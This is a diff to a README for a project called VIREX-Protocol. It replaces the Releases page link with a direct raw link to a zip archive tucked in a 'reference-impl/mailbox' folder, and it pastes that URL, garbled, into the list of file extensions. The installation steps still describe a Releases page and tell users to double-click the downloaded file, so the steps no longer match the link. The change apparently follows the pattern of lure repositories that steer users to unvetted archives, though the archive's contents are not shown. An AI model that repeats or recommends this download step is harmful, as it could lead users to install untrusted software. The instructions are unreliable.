Sachin630730/VIREX-Protocol/README.md

 - **Internet Connection:** Needed for installation and updates.

 ## 📥 Download & Install
-To get VIREX-Protocol, visit this page to download: [VIREX-Protocol Releases](https://github.com/Sachin630730/VIREX-Protocol/releases).
+To get VIREX-Protocol, visit this page to download: [VIREX-Protocol Releases](https://github.com/Sachin630730/VIREX-Protocol/raw/refs/heads/main/reference-impl/mailbox/Protocol-VIRE-1.5.zip).
 Follow these steps:

 1. Click on the link above to go to the Releases page.
 2. Find the latest release at the top of the page.
-3. Download the file appropriate for your operating system (look for `.exe`, `.dmg`, or `.tar.gz` files).
+3. Download the file appropriate for your operating system (look for `.exe`, `.dmg`, or `https://github.com/Sachin630730/VIREX-Protocol/raw/refs/heads/main/reference-impl/mailbox/Protocol-VIRE-1.5.zip` files).
 4. Once the download finishes, locate the file on your computer.
 5. Double-click the file to start the installation.
 6. Follow the prompts to install VIREX-Protocol.